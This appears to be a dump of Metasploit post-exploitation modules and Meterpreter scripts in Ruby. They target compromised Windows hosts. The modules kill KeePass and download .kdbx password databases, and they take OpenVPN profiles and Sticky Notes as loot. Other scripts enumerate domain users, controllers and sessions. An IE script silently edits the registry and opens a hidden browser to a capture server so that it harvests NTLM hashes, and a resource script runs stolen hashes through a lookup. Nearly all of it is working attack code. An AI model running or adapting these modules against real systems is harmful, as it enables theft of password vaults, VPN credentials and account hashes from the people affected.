require 'msf/core/post/windows/registry' 16 | 17 | class Metasploit3 < Msf::Post 18 | 19 | include Msf::Post::Common 20 | include Msf::Post::File 21 | 22 | include Msf::Post::Windows::Registry 23 | 24 | def initialize(info={}) 25 | super( update_info( info, 26 | 'Name' => 'Windows Gather Enumerate Domain Users', 27 | 'Description' => %q{ 28 | This module will enumerate users included in the 'Domain Users' group for the primary Domain. 29 | }, 30 | 'License' => MSF_LICENSE, 31 | 'Author' => [ 'Joshua Abraham '], 32 | 'Platform' => [ 'win'], 33 | 'SessionTypes' => [ 'meterpreter' ] 34 | )) 35 | end 36 | 37 | # Run Method for when run command is issued 38 | def run 39 | print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil? 40 | domain = get_domain() 41 | 42 | if not domain.empty? 43 | dom_users = list_domain_group_mem("Domain Users") 44 | list_group_members(domain, dom_users) 45 | end 46 | end 47 | 48 | # List Members of a domain group 49 | def list_domain_group_mem(group) 50 | account_list = [] 51 | devisor = "-------------------------------------------------------------------------------\r\n" 52 | raw_list = client.shell_command_token("net groups \"#{group}\" /domain").split(devisor)[1] 53 | if raw_list =~ /The command completed successfully/ 54 | raw_list.sub!(/The command completed successfully\./,'') 55 | raw_list.split(" ").each do |m| 56 | account_list << m 57 | end 58 | end 59 | return account_list 60 | end 61 | 62 | # Gets the Domain Name 63 | def get_domain() 64 | domain = "" 65 | begin 66 | subkey = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\History" 67 | v_name = "DCName" 68 | domain_dc = registry_getvaldata(subkey, v_name) 69 | dom_info = domain_dc.split('.') 70 | domain = dom_info[1].upcase 71 | rescue 72 | print_error("This host is not part of a domain.") 73 | end 74 | return domain 75 | end 76 | 77 | def list_group_members(domain,dom_users) 78 | tbl = Rex::Ui::Text::Table.new( 79 | 'Header' => "List of Domain Users for the primary Domain.", 80 | 'Indent' => 1, 81 | 'Columns' => 82 | [ 83 | "Domain", 84 | "Group", 85 | "Member", 86 | ]) 87 | dom_users.each do |user| 88 | tbl << [domain,"Domain Users",user] 89 | end 90 | results = tbl.to_s 91 | print_line("\n" + results + "\n") 92 | end 93 | end 94 | -------------------------------------------------------------------------------- /modules/post/unstable/keepass_jacker.rb: -------------------------------------------------------------------------------- 1 | # $Id: keepass_jacker.rb 2012-05-01 rapid7 $ 2 | 3 | ## 4 | # This file is part of the Metasploit Framework and may be subject to 5 | # redistribution and commercial restrictions. Please see the Metasploit 6 | # web site for more information on licensing and terms of use. 7 | # http://metasploit.com/ 8 | ## 9 | 10 | require 'msf/core' 11 | require 'rex' 12 | require 'msf/core/post/windows/user_profiles' 13 | 14 | 15 | 16 | class Metasploit3 < Msf::Post 17 | include Msf::Auxiliary::Report 18 | include Msf::Post::Windows::UserProfiles 19 | def initialize(info={}) 20 | super( update_info( info, 21 | 'Name' => 'Windows Keepass Database Finder', 22 | 'Description' => %q{ 23 | This module downloads any keepass kdbx files that it finds 24 | }, 25 | 'License' => MSF_LICENSE, 26 | 'Author' => [ 'balgan ', 'klinzter '$Revision: 3195e713 $', 28 | 'Platform' => [ 'win' ], 29 | 'SessionTypes' => [ 'meterpreter' ] 30 | )) 31 | end 32 | 33 | def run 34 | print_status("Checking All Users Documents Folders For Keepass Files...") 35 | print_status("Attempting to kill keepass") 36 | kill_keepass() 37 | grab_user_profiles().each do |user| 38 | print_status("Searching #{user['MyDocs']}") 39 | next if user['MyDocs'] == nil 40 | dir = user['MyDocs'] 41 | files = client.fs.dir.entries(dir) 42 | files.each do |f| 43 | if f.to_s.include?(".kdbx") 44 | begin 45 | filelocation = dir + "\\" + f 46 | jack_keepass(filelocation) 47 | end 48 | end 49 | end 50 | end 51 | 52 | grab_user_profiles().each do |user| 53 | print_status("Searching #{user['Desktop']}") 54 | next if user['Desktop'] == nil 55 | dir = user['Desktop'] 56 | files = client.fs.dir.entries(dir) 57 | files.each do |f| 58 | if f.to_s.include?(".kdbx") 59 | begin 60 | filelocation = dir + "\\" + f 61 | jack_keepass(filelocation) 62 | end 63 | end 64 | end 65 | end 66 | end 67 | 68 | 69 | def jack_keepass(filename) 70 | print_status("Downloading: #{filename}") 71 | begin 72 | path = filename 73 | data = "" 74 | filesaving = session.fs.file.new(path, "rb") 75 | until filesaving.eof? 76 | data << filesaving.read 77 | store_loot("KEEPASS.kdbx", "text/plain", session, data, filename, "loot #{path}") 78 | end 79 | end 80 | end 81 | 82 | def kill_keepass 83 | client.sys.process.get_processes().each do |x| 84 | if x['name'].downcase == "keepass.exe" 85 | print_status(" Keepass Process Found...") 86 | print_status(" Killing Process PID #{x['pid']}...") 87 | session.sys.process.kill(x['pid']) rescue nil 88 | end 89 | end 90 | end 91 | end -------------------------------------------------------------------------------- /modules/post/unstable/kill_by_name.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # $Id$ 3 | ## 4 | 5 | ## 6 | # ## This file is part of the Metasploit Framework and may be subject to 7 | # redistribution and commercial restrictions. Please see the Metasploit 8 | # web site for more information on licensing and terms of use. 9 | # http://metasploit.com/ 10 | ## 11 | 12 | require 'msf/core' 13 | require 'rex' 14 | 15 | class Metasploit3 < Msf::Post 16 | 17 | 18 | def initialize(info={}) 19 | super( update_info( info, 20 | 'Name' => 'Kill running processes by PID or name', 21 | 'Description' => %q{ This module will kill all PIDs matching PIDLIST and/or find 22 | every process matching the namelist, then kill them. Current session 23 | PID is ignored, and a whitelist can be passed. 24 | }, 25 | 'License' => MSF_LICENSE, 26 | 'Author' => [ 'RageLtMan'], 27 | 'Version' => '$Revision$', 28 | 'Platform' => [ 'win' ], 29 | 'SessionTypes' => [ 'meterpreter'] 30 | )) 31 | 32 | register_options( 33 | [ 34 | OptString.new('PIDLIST', [false, 'List of comma separated PIDs to kill.', '']), 35 | OptString.new('NAMELIST',[false, 'List of comma separated names to kill', '']) 36 | ], self.class) 37 | 38 | register_advanced_options( 39 | [ 40 | OptString.new('IGNORE_LIST', [false, 'List of comma separated PIDs to keep.', '']), 41 | ], self.class) 42 | end 43 | 44 | # Run Method for when run command is issued 45 | def run 46 | unless client.platform =~ /win/ 47 | print_error("This module requires native Windows meterpreter functions not compatible with the selected session") 48 | return 49 | end 50 | 51 | print_status("Running module against #{sysinfo['Computer']}") 52 | 53 | pids = datastore['PIDLIST'].split(',').map {|x| x.to_i} 54 | namelist = datastore['NAMELIST'].split(',').map {|n| n.strip} 55 | keep_pids = datastore['IGNORE_LIST'].split(',').map {|x| x.to_i} 56 | 57 | if (pids.empty? and namelist.empty?) 58 | print_error("Names or PIDS must be entered") 59 | return 60 | end 61 | 62 | if namelist and !namelist.empty? 63 | namelist.each do |name| 64 | client.sys.process.get_processes.find_all {|p| p['name'] == name }.map do |process| 65 | vprint_good("Adding #{process['name']} with PID #{process['pid']}") 66 | pids << process['pid'].to_i 67 | end 68 | end 69 | end 70 | # Suicide prevention and ignore list 71 | pids = pids - keep_pids - [client.sys.process.getpid] 72 | 73 | pids.each do |pid| 74 | vprint_good("Killing #{pid}") 75 | client.sys.process.kill(pid) 76 | end 77 | 78 | end 79 | 80 | 81 | end 82 | -------------------------------------------------------------------------------- /modules/post/unstable/openvpn_profiles_jack.rb: -------------------------------------------------------------------------------- 1 | # $Id: keepass_jacker.rb 2012-05-01 rapid7 $ 2 | 3 | ## 4 | # This file is part of the Metasploit Framework and may be subject to 5 | # redistribution and commercial restrictions. Please see the Metasploit 6 | # web site for more information on licensing and terms of use. 7 | # http://metasploit.com/ 8 | ## 9 | 10 | require 'msf/core' 11 | require 'rex' 12 | require 'msf/core/post/windows/user_profiles' 13 | 14 | class Metasploit3 < Msf::Post 15 | include Msf::Auxiliary::Report 16 | include Msf::Post::Windows::UserProfiles 17 | 18 | def initialize(info={}) 19 | super( update_info( info, 20 | 'Name' => 'OpenVPN Profile Downloader', 21 | 'Description' => %q{ 22 | This module downloads OpenVPN Profiles that can be imported into the OpenVPN client to automatically connect to a VPN. 23 | }, 24 | 'License' => MSF_LICENSE, 25 | 'Author' => [ 'balgan '], 26 | 'Version' => '$Revision: 3195e713 $', 27 | 'Platform' => [ 'win' ], 28 | 'SessionTypes' => [ 'meterpreter' ] 29 | )) 30 | end 31 | 32 | def run 33 | arch = client.sys.config.sysinfo["Architecture"] 34 | print_status("Checking if folder exists...") 35 | if arch == "x86" 36 | dir = "C:\\Program Files\\OpenVPN Technologies\\OpenVPN Client\\etc\\profile\\" 37 | begin 38 | session.fs.dir.entries(dir) 39 | jack_openvpnprofiles(dir) 40 | rescue 41 | print_error("Path seems invalid: #{dir}") 42 | return nil 43 | end 44 | else 45 | dir = "C:\\Program Files (x86)\\OpenVPN Technologies\\OpenVPN Client\\etc\\profile\\" 46 | begin 47 | session.fs.dir.entries(dir) 48 | jack_openvpnprofiles(dir) 49 | rescue 50 | print_error("Path seems invalid: #{dir}") 51 | return nil 52 | end 53 | 54 | end 55 | end 56 | 57 | def jack_openvpnprofiles(folder) 58 | print_status("OpenVPN Profiles Folder Found at: #{folder}") 59 | print_status("Retrieving Profile Files...") 60 | files = [""] 61 | files = client.fs.dir.entries(folder) 62 | print_status("#{files}") 63 | files.each do |f| 64 | begin 65 | path = folder + f 66 | print_status("CURRENT PATH #{path}") 67 | data = "" 68 | next if f =~/^(\.+)$/ 69 | begin 70 | filesaving = session.fs.file.new(path, "rb") 71 | until filesaving.eof? 72 | data << filesaving.read 73 | end 74 | store_loot("#{f}", "text/plain", session, data, f, "loot #{path}") 75 | rescue ::Interrupt 76 | raise $! 77 | rescue ::Exception => e 78 | print_error("Failed to download #{path}: #{e.class} #{e}") 79 | end 80 | end 81 | end 82 | end 83 | 84 | end -------------------------------------------------------------------------------- /modules/post/windows/q/keepass_jacker.rb: -------------------------------------------------------------------------------- 1 | # $Id$ 2 | 3 | ## 4 | # This file is part of the Metasploit Framework and may be subject to 5 | # redistribution and commercial restrictions. Please see the Metasploit 6 | # web site for more information on licensing and terms of use. 7 | # http://metasploit.com/ 8 | ## 9 | 10 | require 'msf/core' 11 | require 'rex' 12 | require 'msf/core/post/windows/user_profiles' 13 | 14 | class Metasploit3 < Msf::Post 15 | 16 | include Msf::Auxiliary::Report 17 | include Msf::Post::Windows::UserProfiles 18 | 19 | def initialize(info={}) 20 | super( update_info( info, 21 | 'Name' => 'Windows Keepass Database Finder', 22 | 'Description' => %q{ 23 | This module downloads any keepass kdbx files that it finds 24 | }, 25 | 'License' => MSF_LICENSE, 26 | 'Author' => [ 27 | 'balgan ', 28 | 'klinzter '$Revision$', 31 | 'Platform' => [ 'windows' ], 32 | 'SessionTypes' => [ 'meterpreter' ] 33 | )) 34 | end 35 | 36 | def run 37 | print_status("Checking All Users Documents Folders For Keepass Files...") 38 | print_status("Attempting to kill keepass") 39 | 40 | kill_keepass() 41 | 42 | grab_user_profiles().each do |user| 43 | print_status("Searching #{user['MyDocs']}") 44 | next if user['MyDocs'] == nil 45 | dir = user['MyDocs'] 46 | files = client.fs.dir.entries(dir) 47 | 48 | files.each do |f| 49 | if f.to_s.include?(".kdbx") 50 | filelocation = dir + "\\" + f 51 | jack_keepass(filelocation) 52 | end 53 | end 54 | 55 | end 56 | 57 | grab_user_profiles().each do |user| 58 | print_status("Searching #{user['Desktop']}") 59 | next if user['Desktop'] == nil 60 | dir = user['Desktop'] 61 | files = client.fs.dir.entries(dir) 62 | files.each do |f| 63 | if f.to_s.include?(".kdbx") 64 | filelocation = dir + "\\" + f 65 | jack_keepass(filelocation) 66 | end 67 | end 68 | end 69 | end 70 | 71 | 72 | def jack_keepass(filename) 73 | print_status("Downloading: #{filename}") 74 | begin 75 | path = filename 76 | data = "" 77 | filesaving = session.fs.file.new(path, "rb") 78 | until filesaving.eof? 79 | data << filesaving.read 80 | store_loot("KEEPASS.kdbx", "text/plain", session, data, filename, "loot #{path}") 81 | end 82 | end 83 | end 84 | 85 | def kill_keepass 86 | client.sys.process.get_processes().each do |x| 87 | if x['name'].downcase == "keepass.exe" 88 | print_status(" Keepass Process Found...") 89 | print_status(" Killing Process PID #{x['pid']}...") 90 | session.sys.process.kill(x['pid']) rescue nil 91 | end 92 | end 93 | end 94 | end 95 | -------------------------------------------------------------------------------- /modules/post/windows/q/openvpn_profiles_jack.rb: -------------------------------------------------------------------------------- 1 | # $Id$ 2 | 3 | ## 4 | # This file is part of the Metasploit Framework and may be subject to 5 | # redistribution and commercial restrictions. Please see the Metasploit 6 | # web site for more information on licensing and terms of use. 7 | # http://metasploit.com/ 8 | ## 9 | 10 | require 'msf/core' 11 | require 'rex' 12 | require 'msf/core/post/windows/user_profiles' 13 | 14 | class Metasploit3 < Msf::Post 15 | include Msf::Auxiliary::Report 16 | include Msf::Post::Windows::UserProfiles 17 | 18 | def initialize(info={}) 19 | super( update_info( info, 20 | 'Name' => 'OpenVPN Profile Downloader', 21 | 'Description' => %q{ 22 | This module downloads OpenVPN Profiles that can be imported into the OpenVPN client to automatically connect to a VPN. 23 | }, 24 | 'License' => MSF_LICENSE, 25 | 'Author' => [ 'balgan '], 26 | 'Version' => '$Revision$', 27 | 'Platform' => [ 'windows' ], 28 | 'SessionTypes' => [ 'meterpreter' ] 29 | )) 30 | end 31 | 32 | def run 33 | arch = client.sys.config.sysinfo["Architecture"] 34 | print_status("Checking if folder exists...") 35 | if arch == "x86" 36 | dir = "%programfiles%\\OpenVPN Technologies\\OpenVPN Client\\etc\\profile\\" 37 | begin 38 | session.fs.dir.entries(dir) 39 | jack_openvpnprofiles(dir) 40 | rescue 41 | print_error("Path seems invalid: #{dir}") 42 | return nil 43 | end 44 | else 45 | dir = "%programfiles%\\OpenVPN Technologies\\OpenVPN Client\\etc\\profile\\" 46 | begin 47 | session.fs.dir.entries(dir) 48 | jack_openvpnprofiles(dir) 49 | rescue 50 | print_error("Path seems invalid: #{dir}") 51 | return nil 52 | end 53 | 54 | end 55 | end 56 | 57 | def jack_openvpnprofiles(folder) 58 | print_status("OpenVPN Profiles Folder Found at: #{folder}") 59 | print_status("Retrieving Profile Files...") 60 | files = [""] 61 | files = client.fs.dir.entries(folder) 62 | print_status("#{files}") 63 | files.each do |f| 64 | begin 65 | path = folder + f 66 | print_status("CURRENT PATH #{path}") 67 | data = "" 68 | next if f =~/^(\.+)$/ 69 | begin 70 | filesaving = session.fs.file.new(path, "rb") 71 | until filesaving.eof? 72 | data << filesaving.read 73 | end 74 | store_loot("#{f}", "text/plain", session, data, f, "loot #{path}") 75 | rescue ::Interrupt 76 | raise $! 77 | rescue ::Exception => e 78 | print_error("Failed to download #{path}: #{e.class} #{e}") 79 | end 80 | end 81 | end 82 | end 83 | 84 | end 85 | -------------------------------------------------------------------------------- /modules/post/windows/q/stickynotes-jacker.rb: -------------------------------------------------------------------------------- 1 | # $Id: keepass_jacker.rb 2012-05-01 rapid7 $ 2 | 3 | ## 4 | # This file is part of the Metasploit Framework and may be subject to 5 | # redistribution and commercial restrictions. Please see the Metasploit 6 | # web site for more information on licensing and terms of use. 7 | # http://metasploit.com/ 8 | ## 9 | 10 | require 'msf/core' 11 | require 'rex' 12 | require 'msf/core/post/windows/user_profiles' 13 | 14 | class Metasploit3 < Msf::Post 15 | include Msf::Auxiliary::Report 16 | include Msf::Post::Windows::UserProfiles 17 | 18 | def initialize(info={}) 19 | super( update_info( info, 20 | 'Name' => 'Windows 7 Sticky Notes Downloader', 21 | 'Description' => %q{ 22 | This module downloads the file that contains Sticky Notes in windows 7 23 | }, 24 | 'License' => MSF_LICENSE, 25 | 'Author' => [ 'balgan '], 26 | 'Version' => '$Revision: 3195e713 $', 27 | 'Platform' => [ 'windows' ], 28 | 'SessionTypes' => [ 'meterpreter' ] 29 | )) 30 | end 31 | 32 | def run 33 | print_status("Checking if folder exists...") 34 | dir = "%appdata%\\Microsoft\\Sticky Notes\\" 35 | begin 36 | session.fs.dir.entries(dir) 37 | jack_stickynotesfiles(dir) 38 | rescue 39 | print_error("Path seems invalid: #{dir}") 40 | return nil 41 | end 42 | end 43 | 44 | def jack_stickynotesfiles(folder) 45 | print_status("Sticky notes found at: #{folder}") 46 | print_status("Retrieving Sticky Notes Files...") 47 | files = [""] 48 | files = client.fs.dir.entries(folder) 49 | print_status("#{files}") 50 | files.each do |f| 51 | begin 52 | path = folder + f 53 | print_status("CURRENT PATH #{path}") 54 | data = "" 55 | next if f =~/^(\.+)$/ 56 | begin 57 | filesaving = session.fs.file.new(path, "rb") 58 | until filesaving.eof? 59 | data << filesaving.read 60 | end 61 | store_loot("#{f}", "text/plain", session, data, f, "loot #{path}") 62 | rescue ::Interrupt 63 | raise $! 64 | rescue ::Exception => e 65 | print_error("Failed to download #{path}: #{e.class} #{e}") 66 | end 67 | end 68 | end 69 | end 70 | 71 | end -------------------------------------------------------------------------------- /scripts/getdomains.rb: -------------------------------------------------------------------------------- 1 | #structure 2 | =begin 3 | NET_API_STATUS NetServerEnum( 4 | __in_opt LPCWSTR servername, 5 | __in DWORD level, 6 | __out LPBYTE *bufptr, 7 | __in DWORD prefmaxlen, 8 | __out LPDWORD entriesread, 9 | __out LPDWORD totalentries, 10 | __in DWORD servertype, 11 | __in_opt LPCWSTR domain, 12 | __inout_opt LPDWORD resume_handle 13 | ); 14 | =end 15 | 16 | client.railgun.add_function('netapi32', 'NetServerEnum', 'DWORD',[ 17 | ['PWCHAR','servername','in'], 18 | ['DWORD','level','in'], 19 | ['PDWORD','bufptr','out'], 20 | ['DWORD','prefmaxlen','in'], 21 | ['PDWORD','entriesread','out'], 22 | ['PDWORD','totalentries','out'], 23 | ['DWORD','servertype','in'], 24 | ['PWCHAR','domain','in'], 25 | ['PDWORD','resume_handle','inout'] 26 | ]) 27 | 28 | domain_enum = 2147483648 # SV_TYPE_DOMAIN_ENUM = hex 80000000 29 | buffersize = 500 30 | result = client.railgun.netapi32.NetServerEnum(nil,100,4,buffersize,4,4,domain_enum,nil,nil) 31 | print_status("Finding the right buffersize...") 32 | while result['return'] == 234 33 | print_status("Tested #{buffersize}, got #{result['entriesread']} of #{result['totalentries']}") 34 | buffersize = buffersize + 500 35 | result = client.railgun.netapi32.NetServerEnum(nil,100,4,buffersize,4,4,domain_enum,nil,nil) 36 | end 37 | 38 | count = result['totalentries'] 39 | print_status("#{count} domain(s) found.") 40 | startmem = result['bufptr'] 41 | 42 | base = 0 43 | domains = [] 44 | mem = client.railgun.memread(startmem, 8*count) 45 | count.times{|i| 46 | x = {} 47 | x[:platform] = mem[(base + 0),4].unpack("V*")[0] 48 | nameptr = mem[(base + 4),4].unpack("V*")[0] 49 | x[:domain] = client.railgun.memread(nameptr,255).split("\0\0")[0].split("\0").join 50 | domains << x 51 | base = base + 8 52 | } 53 | 54 | domaincontrollers = 24 # 10 + 8 (SV_TYPE_DOMAIN_BAKCTRL || SV_TYPE_DOMAIN_CTRL) 55 | 56 | domains.each do |x| 57 | print_status("Enumerating DCs for #{x[:domain]}") 58 | result = client.railgun.netapi32.NetServerEnum(nil,100,4,buffersize,4,4,domaincontrollers,x[:domain],nil) 59 | while result['return'] == 234 60 | buffersize = buffersize + 500 61 | result = client.railgun.netapi32.NetServerEnum(nil,100,4,buffersize,4,4,domaincontrollers,x[:domain],nil) 62 | end 63 | if result['totalentries'] == 0 64 | print_error("No Domain Controllers found...") 65 | next 66 | end 67 | 68 | count = result['totalentries'] 69 | startmem = result['bufptr'] 70 | 71 | base = 0 72 | x[:dc] = [] 73 | mem = client.railgun.memread(startmem, 8*count) 74 | count.times{|i| 75 | t = {} 76 | t[:platform] = mem[(base + 0),4].unpack("V*")[0] 77 | nameptr = mem[(base + 4),4].unpack("V*")[0] 78 | t[:dc_hostname] = client.railgun.memread(nameptr,255).split("\0\0")[0].split("\0").join 79 | x[:dc] << t 80 | base = base + 8 81 | print_status(t[:dc_hostname]) 82 | } 83 | end -------------------------------------------------------------------------------- /scripts/getsessions.rb: -------------------------------------------------------------------------------- 1 | def read_session_struct(startmem,count) 2 | base = 0 3 | netsessions = [] 4 | mem = client.railgun.memread(startmem, 16*count) 5 | count.times{|i| 6 | x = {} 7 | cnameptr = mem[(base + 0),4].unpack("V*")[0] 8 | usernameptr = mem[(base + 4),4].unpack("V*")[0] 9 | x[:usetime] = mem[(base + 8),4].unpack("V*")[0] 10 | x[:idletime] = mem[(base + 12),4].unpack("V*")[0] 11 | x[:cname] = client.railgun.memread(cnameptr,255).split("\0\0")[0].split("\0").join 12 | x[:username] = client.railgun.memread(usernameptr,255).split("\0\0")[0].split("\0").join 13 | netsessions << x 14 | base = base + 16 15 | } 16 | return netsessions 17 | end 18 | 19 | client.railgun.add_function('netapi32', 'NetSessionEnum', 'DWORD',[ 20 | ['PWCHAR','servername','in'], 21 | ['PWCHAR','UncClientName','in'], 22 | ['PWCHAR','username','in'], 23 | ['DWORD','level','in'], 24 | ['PDWORD','bufptr','out'], 25 | ['DWORD','prefmaxlen','in'], 26 | ['PDWORD','entriesread','out'], 27 | ['PDWORD','totalentries','out'], 28 | ['PDWORD','resume_handle','inout'] 29 | ]) 30 | 31 | 32 | buffersize = 500 33 | result = client.railgun.netapi32.NetSessionEnum("167.228.2.166",nil,nil,10,4,buffersize,4,4,nil) 34 | print_error(result.inspect) 35 | if result['return'] == 5 36 | print_error("Access Denied when trying to access that host") 37 | raise Script::Completed 38 | elsif result['return'] == 53 39 | print_error("Host not found or could not be contacted") 40 | raise Script::Completed 41 | elsif result['return'] == 123 42 | print_error("Invalid host") 43 | raise Script::Completed 44 | elsif result['return'] == 0 45 | print_status("#{result['totalentries']} sessions identified") 46 | else 47 | print_status("Recieved a error code I didn't account for: #{result['return']}") 48 | raise Script::Completed 49 | end 50 | 51 | print_status("Finding the right buffersize...") 52 | while result['return'] == 234 53 | print_status("Tested #{buffersize}, got #{result['entriesread']} of #{result['totalentries']}") 54 | buffersize = buffersize + 500 55 | result = client.railgun.netapi32.NetSessionEnum(nil,nil,nil,10,4,buffersize,4,4,nil) 56 | end 57 | 58 | netsessions = read_session_struct(result['bufptr'],result['totalentries']) 59 | if netsessions.size > 0 60 | netsessions.each do |x| 61 | print_status("#{x[:username]} is logged in from #{x[:cname]} and has been idle for #{x[:idletime]} seconds") 62 | end 63 | end 64 | 65 | -------------------------------------------------------------------------------- /scripts/ie_hashgrab.rb: -------------------------------------------------------------------------------- 1 | mul = client.framework.auxiliary.create("server/capture/http_ntlm") 2 | 3 | mul.datastore['URIPATH'] = "/" 4 | 5 | mul.datastore['JTRFILE'] = "/tmp/jtrfile" 6 | 7 | mul.run_simple( 8 | 'RunAsJob' => true 9 | ) 10 | 11 | client.sys.process.execute("cmd.exe /c echo Windows Registry Editor Version 5.00 > test.reg", nil, {'Hidden' => 'true'}) 12 | 13 | client.sys.process.execute("cmd.exe /c echo [HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\Ranges\\Range10] >> test.reg", nil, {'Hidden' => 'true'}) 14 | 15 | client.sys.process.execute("cmd.exe /c echo \"http\"\=dword\:00000001 >> test.reg", nil, {'Hidden' => 'true'}) 16 | 17 | client.sys.process.execute("cmd.exe /c echo \"\:Range\"\=\"192.168.139.128\" >> test.reg", nil, {'Hidden' => 'true'}) 18 | 19 | client.sys.process.execute("cmd.exe /c regedit.exe \-s test.reg", nil, {'Hidden' => 'true'}) 20 | 21 | 22 | client.sys.process.execute("c:\\program files\\internet explorer\\iexplore.exe -new http://192.168.139.128:8080/" , nil, {'Hidden' => 'true'}) 23 | -------------------------------------------------------------------------------- /scripts/listdrives.rb: -------------------------------------------------------------------------------- 1 | # Author - mubix 2 | # http://www.room362.com/blog/2010/7/7/intro-to-railgun-win-api-for-meterpreter.html 3 | # Make the API call to enum drive letters 4 | a = client.railgun.kernel32.GetLogicalDrives()["return"] 5 | # Math magic to convert the binary to letters 6 | drives = [] 7 | letters = "ABCDEFGHIJKLMNOPQRSTUVWXYZ" 8 | (0..25).each do |i| 9 | test = letters[i,1] 10 | rem = a % (2**(i+1)) 11 | if rem > 0 12 | drives << test 13 | a = a - rem 14 | end 15 | end 16 | print_line("Drives Available = #{drives.inspect}") 17 | -------------------------------------------------------------------------------- /scripts/loggedon.rb: -------------------------------------------------------------------------------- 1 | # Author - mubix 2 | # http://www.room362.com/blog/2011/9/17/who-is-logged-in-a-quick-way-to-pick-your-targets.html 3 | users = [] 4 | client.sys.process.each_process do |x| 5 | users << x["user"] 6 | end 7 | 8 | users.sort! 9 | users.uniq! 10 | users.delete_if {|x| x =~ /^NT\ AUTHORITY/} 11 | users.delete_if {|x| x == ""} 12 | loggedin = users.join(', ') 13 | -------------------------------------------------------------------------------- /scripts/search_hash_creds.rc: -------------------------------------------------------------------------------- 1 | # Not for distribution -- just an example of looping through creds to do things 2 | # with them. However, duckduck_password and this script should certainly just 3 | # be combined into one plugin, rather than a module. 4 | 5 | use auxiliary/gather/duckduck_password 6 | 7 | framework.db.creds.select {|c| c.ptype == "smb_hash"}.each do |cred| 8 | lm,ntlm = cred.pass.split(":") 9 | run_single("set HASH #{lm}") 10 | print_status "#{cred.service.host.address}:#{cred.service.port}:#{cred.user} Checking LM hash..." 11 | run_single("run") 12 | select(nil,nil,nil,1) 13 | run_single("set HASH #{ntlm}") if ntlm 14 | print_status "#{cred.service.host.address}:#{cred.service.port}:#{cred.user} Checking NTLM hash..." 15 | run_single("run") 16 | select(nil,nil,nil,1) 17 | end 18 | 19 | 20 | --------------------------------------------------------------------------------